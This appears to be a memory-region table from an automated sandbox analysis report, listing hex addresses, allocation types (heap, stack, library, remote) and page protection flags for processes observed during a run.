page read and write
7330000
heap
page read and write
7FFD9A10C000
trusted library allocation
page execute and read and write
221C3095000
heap
page read and write
221C2F11000
heap
page read and write
1CBB4288000
heap
page read and write
7CF707E000
stack
page read and write
1CB9BD05000
trusted library allocation
page read and write
1CB9C0FE000
trusted library allocation
page read and write
7CF1000
heap
page read and write
7551000
heap
page read and write
3030000
trusted library allocation
page read and write
1CB9A0A6000
heap
page read and write
3110000
heap
page read and write
1CBB4218000
heap
page read and write
4B4E000
stack
page read and write
234BD000
stack
page read and write
1CB9DA51000
trusted library allocation
page read and write
78B0000
trusted library allocation
page read and write
3110000
heap
page read and write
2356E000
stack
page read and write
7FFD9A260000
trusted library allocation
page read and write
89D0000
trusted library allocation
page read and write
4D594FB000
stack
page read and write
7CF6B7E000
stack
page read and write
3060000
trusted library allocation
page read and write
4D9B000
trusted library allocation
page read and write
221C1200000
heap
page read and write
87E5000
heap
page read and write
4AAE000
stack
page read and write
236BD000
stack
page read and write
4B9E000
stack
page read and write
221C11EE000
heap
page read and write
1CBABC81000
trusted library allocation
page read and write
7CF67B3000
stack
page read and write
7FFD9A235000
trusted library allocation
page read and write
4C5E000
stack
page read and write
4CED000
stack
page read and write
336E000
stack
page read and write
221C3099000
heap
page read and write
7F520000
trusted library allocation
page execute and read and write
5D69000
trusted library allocation
page read and write
221C1100000
heap
page read and write
221C2F1F000
heap
page read and write
221C2F1F000
heap
page read and write
70D0000
direct allocation
page read and write
4D58CFE000
stack
page read and write
7FFD9A280000
trusted library allocation
page read and write
221C1190000
heap
page read and write
788D000
stack
page read and write
2335E000
stack
page read and write
221C30D3000
heap
page read and write
221C2F2E000
heap
page read and write
7668000
heap
page read and write
1CBABC8F000
trusted library allocation
page read and write
4B05000
heap
page execute and read and write
221C11F2000
heap
page read and write
221C30BE000
heap
page read and write
23450000
direct allocation
page read and write
221C30E6000
heap
page read and write
7DD0000
direct allocation
page read and write
221C30E6000
heap
page read and write
1CB9A070000
trusted library allocation
page read and write
8510000
trusted library allocation
page read and write
221C30AF000
heap
page read and write
221C308F000
heap
page read and write
7674000
heap
page read and write
2E20000
heap
page read and write
7CF6D7E000
stack
page read and write
7FFD9A2B0000
trusted library allocation
page read and write
7691000
heap
page read and write
78D0000
trusted library allocation
page read and write
221C2F11000
heap
page read and write
2DC0000
heap
page read and write
1CB9BAC1000
heap
page read and write
3020000
trusted library section
page read and write
221C1192000
heap
page read and write
77C917A000
stack
page read and write
221C2F18000
heap
page read and write
6B5D000
remote allocation
page execute and read and write
2EB8000
heap
page read and write
49D0000
heap
page readonly
235F0000
remote allocation
page read and write
87F5000
heap
page read and write
84E0000
trusted library allocation
page read and write
2FC0000
heap
page read and write
3090000
trusted library allocation
page read and write
70F0000
direct allocation
page read and write
4D58BFE000
stack
page read and write
221C2F1D000
heap
page read and write
221C1130000
heap
page read and write
221C1338000
heap
page read and write
4B58000
heap
page read and write
1CB9A0D1000
heap
page read and write
221C30B3000
heap
page read and write
236FC000
stack
page read and write
1CBB4017000
heap
page read and write
221C2F10000
heap
page read and write
615D000
remote allocation
page execute and read and write
1CB9A0D8000
heap
page read and write
1CB9DA35000
trusted library allocation
page read and write
2C30000
heap
page read and write
84DC000
stack
page read and write
8530000
trusted library allocation
page read and write
7080000
direct allocation
page read and write
7CF727B000
stack
page read and write
5D51000
trusted library allocation
page read and write
1CB9DA00000
trusted library allocation
page read and write
86BC000
stack
page read and write
7FFD9A3C0000
trusted library allocation
page read and write
3050000
trusted library allocation
page read and write
1CB9A000000
heap
page read and write
1CB9A315000
heap
page read and write
7DA0000
direct allocation
page read and write
7320000
heap
page read and write
4AFE000
stack
page read and write
7FFD9A3A0000
trusted library allocation
page read and write
7FFD9A380000
trusted library allocation
page read and write
221C2F15000
heap
page read and write
221C114B000
heap
page read and write
7CE5000
heap
page read and write
2E90000
heap
page read and write
221C2F5D000
heap
page read and write
87A0000
trusted library allocation
page read and write
83DD000
stack
page read and write
1CBABF7E000
trusted library allocation
page read and write
23528B98000
heap
page read and write
7FFD9A2F0000
trusted library allocation
page read and write
221C3106000
heap
page read and write
221C30AD000
heap
page read and write
221C30E6000
heap
page read and write
221C2F41000
heap
page read and write
235AE000
stack
page read and write
1CB9DB1D000
trusted library allocation
page read and write
7CF6E78000
stack
page read and write
221C30F5000
heap
page read and write
221C30B3000
heap
page read and write
8430000
heap
page read and write
8A60000
direct allocation
page read and write
7C50000
direct allocation
page read and write
221C2F14000
heap
page read and write
23460000
direct allocation
page read and write
23528EA5000
heap
page read and write
79AB000
stack
page read and write
2339F000
stack
page read and write
3119000
heap
page read and write
221C3090000
heap
page read and write
30D3000
heap
page read and write
7930000
trusted library allocation
page read and write
4260000
remote allocation
page execute and read and write
221C2F41000
heap
page read and write
221C1338000
heap
page read and write
8A30000
direct allocation
page read and write
1CBB40E0000
heap
page read and write
1CB9D2C5000
trusted library allocation
page read and write
3141000
heap
page read and write
221C1190000
heap
page read and write
1CBB41C0000
heap
page read and write
7649000
heap
page read and write
1CB9BEA6000
trusted library allocation
page read and write
2DA0000
heap
page read and write
771B000
heap
page read and write
2B00000
heap
page read and write
755D000
remote allocation
page execute and read and write
2EB0000
heap
page read and write
7FFD9A1F0000
trusted library allocation
page read and write
221C308C000
heap
page read and write
7FFD9A270000
trusted library allocation
page read and write
221C11F2000
heap
page read and write
77E0000
trusted library allocation
page read and write
221C1338000
heap
page read and write
8360000
trusted library allocation
page read and write
2387E000
stack
page read and write
221C2F41000
heap
page read and write
A4E000
stack
page read and write
4D591FE000
stack
page read and write
7CFD000
heap
page read and write
221C2F13000
heap
page read and write
87C0000
trusted library allocation
page read and write
784E000
stack
page read and write
1CBB3FC9000
heap
page read and write
7FFD9A136000
trusted library allocation
page execute and read and write
221C30B3000
heap
page read and write
1CB9A057000
heap
page read and write
89F0000
trusted library allocation
page read and write
4A60000
heap
page execute and read and write
7CF7D4D000
stack
page read and write
9C7D000
direct allocation
page execute and read and write
3043000
trusted library allocation
page execute and read and write
23528B90000
heap
page read and write
7715000
heap
page read and write
2B4C000
stack
page read and write
4A3C000
stack
page read and write
7CF71FE000
stack
page read and write
337C000
heap
page read and write
1CBB4269000
heap
page read and write
221C2F22000
heap
page read and write
8337000
stack
page read and write
7CF7C4E000
stack
page read and write
7CF7DCB000
stack
page read and write
49E8000
trusted library allocation
page read and write
769A000
heap
page read and write
4D30000
heap
page read and write
3050000
heap
page read and write
221C30C5000
heap
page read and write
221C117B000
heap
page read and write
8340000
heap
page read and write
221C2F12000
heap
page read and write
221C30DD000
heap
page read and write
221C1335000
heap
page read and write
221C30B3000
heap
page read and write
1CB9A2C7000
heap
page execute and read and write
7910000
trusted library allocation
page read and write
C47D000
direct allocation
page execute and read and write
1CB9A0D4000
heap
page read and write
221C11EE000
heap
page read and write
7940000
trusted library allocation
page read and write
1CB9A11F000
heap
page read and write
7CF6BFE000
stack
page read and write
221C113B000
heap
page read and write
1CB9C115000
trusted library allocation
page read and write
221C11EE000
heap
page read and write
2E44000
heap
page read and write
78C0000
trusted library allocation
page read and write
7659000
heap
page read and write
221C1330000
heap
page read and write
221C30D9000
heap
page read and write
7CF6C7C000
stack
page read and write
7CF4000
heap
page read and write
1CB9C383000
trusted library allocation
page read and write
304D000
trusted library allocation
page execute and read and write
1CB9A0F4000
heap
page read and write
23500000
heap
page read and write
725D000
stack
page read and write
221C3099000
heap
page read and write
4D2B000
stack
page read and write
1CB9D9FB000
trusted library allocation
page read and write
1CBB4015000
heap
page read and write
7FFD9A237000
trusted library allocation
page read and write
575D000
remote allocation
page execute and read and write
1CB9C7F3000
trusted library allocation
page read and write
221C30B3000
heap
page read and write
7CF6EF7000
stack
page read and write
7CF7E4B000
stack
page read and write
1CB9A0E0000
heap
page read and write
22D10000
direct allocation
page read and write
7FFD9A370000
trusted library allocation
page read and write
221C2F18000
heap
page read and write
7920000
trusted library allocation
page read and write
77DE000
stack
page read and write
7FFD9A06B000
trusted library allocation
page read and write
2FCE000
stack
page read and write
7D36000
heap
page read and write
746E000
stack
page read and write
86FB000
stack
page read and write
70C0000
direct allocation
page read and write
1CB9BC81000
trusted library allocation
page read and write
221C112B000
heap
page read and write
221C2F41000
heap
page read and write
4D592FD000
stack
page read and write
2D3F000
unkown
page read and write
87F9000
heap
page read and write
71BE000
stack
page read and write
221C1159000
heap
page read and write
851B000
trusted library allocation
page read and write
4B50000
heap
page read and write
2312C000
stack
page read and write
221C2F17000
heap
page read and write
7BB5000
heap
page read and write
84F0000
heap
page read and write
7BB0000
heap
page read and write
1CBB424F000
heap
page read and write
221C116E000
heap
page read and write
7310000
heap
page read and write
7729000
heap
page read and write
752E000
stack
page read and write
221C1192000
heap
page read and write
7FFD9A100000
trusted library allocation
page read and write
841E000
stack
page read and write
2331E000
stack
page read and write
A67D000
direct allocation
page execute and read and write
7CF7CCE000
stack
page read and write
7FFD9A170000
trusted library allocation
page execute and read and write
2322E000
stack
page read and write
7E10000
direct allocation
page read and write
221C2F26000
heap
page read and write
4A40000
trusted library allocation
page execute and read and write
71FD000
stack
page read and write
306A000
trusted library allocation
page execute and read and write
729A000
stack
page read and write
7D00000
heap
page read and write
221C3010000
heap
page read and write
4D58EFF000
stack
page read and write
B07D000
direct allocation
page execute and read and write
23910000
heap
page read and write
1CB9A090000
heap
page read and write
2E44000
heap
page read and write
30A0000
heap
page read and write
1CB9A09D000
heap
page read and write
7FFD9A320000
trusted library allocation
page read and write
7FFD9A340000
trusted library allocation
page read and write
7E20000
direct allocation
page read and write
7FFD9A20A000
trusted library allocation
page read and write
7FFD9A300000
trusted library allocation
page read and write
2BE0000
heap
page read and write
8655000
trusted library allocation
page read and write
2CFA000
stack
page read and write
1CB9DA20000
trusted library allocation
page read and write
2BD0000
heap
page read and write
221C30A6000
heap
page read and write
7DE0000
direct allocation
page read and write
221C2F16000
heap
page read and write
7FFD9A250000
trusted library allocation
page read and write
221C2F18000
heap
page read and write
1CB99FC0000
heap
page read and write
2EB5000
heap
page read and write
8570000
trusted library allocation
page read and write
99D000
stack
page read and write
221C32C1000
heap
page read and write
221C1130000
heap
page read and write
87B0000
trusted library allocation
page read and write
1CB9BC70000
heap
page read and write
7FFD9A050000
trusted library allocation
page read and write
7C6A000
heap
page read and write
1CB9DA24000
trusted library allocation
page read and write
221C30FE000
heap
page read and write
7DF0000
direct allocation
page read and write
1CB9A1A0000
trusted library allocation
page read and write
3072000
trusted library allocation
page read and write
3175000
heap
page read and write
779E000
stack
page read and write
87D0000
heap
page read and write
221C1190000
heap
page read and write
23528B50000
heap
page read and write
221C11C8000
heap
page read and write
5D4B000
trusted library allocation
page read and write
4B00000
heap
page execute and read and write
7D60000
direct allocation
page read and write
8420000
trusted library allocation
page execute and read and write
7CF6CFF000
stack
page read and write
1CB9D21E000
trusted library allocation
page read and write
221C310E000
heap
page read and write
4E98000
trusted library allocation
page read and write
7FFD9A360000
trusted library allocation
page read and write
221C113E000
heap
page read and write
3040000
trusted library allocation
page read and write
221C2F5D000
heap
page read and write
221C30E6000
heap
page read and write
221C2F41000
heap
page read and write
221C2F32000
heap
page read and write
221C2F29000
heap
page read and write
221C308D000
heap
page read and write
7312000
heap
page read and write
77C947F000
stack
page read and write
8790000
trusted library allocation
page execute and read and write
221C1192000
heap
page read and write
221C30E1000
heap
page read and write
221C2F41000
heap
page read and write
221C112F000
heap
page read and write
221C30DD000
heap
page read and write
7FFD9A2D0000
trusted library allocation
page read and write
221C308E000
heap
page read and write
1CB9C3DC000
trusted library allocation
page read and write
1CB9A050000
heap
page read and write
23528B20000
heap
page read and write
7FFD9A2A0000
trusted library allocation
page read and write
23440000
direct allocation
page read and write
7CF6FF9000
stack
page read and write
1CB9C18B000
trusted library allocation
page read and write
7662000
heap
page read and write
221C30A0000
heap
page read and write
1CB9C2E1000
trusted library allocation
page read and write
7FFD9A390000
trusted library allocation
page read and write
713E000
stack
page read and write
235F0000
remote allocation
page read and write
7CF717E000
stack
page read and write
221C2F17000
heap
page read and write
435D000
remote allocation
page execute and read and write
8823000
heap
page read and write
2373D000
stack
page read and write
2D39000
stack
page read and write
1CB9A080000
heap
page execute and read and write
2E43000
heap
page read and write
2AFD000
stack
page read and write
There are 588 hidden memdumps, click here to show them.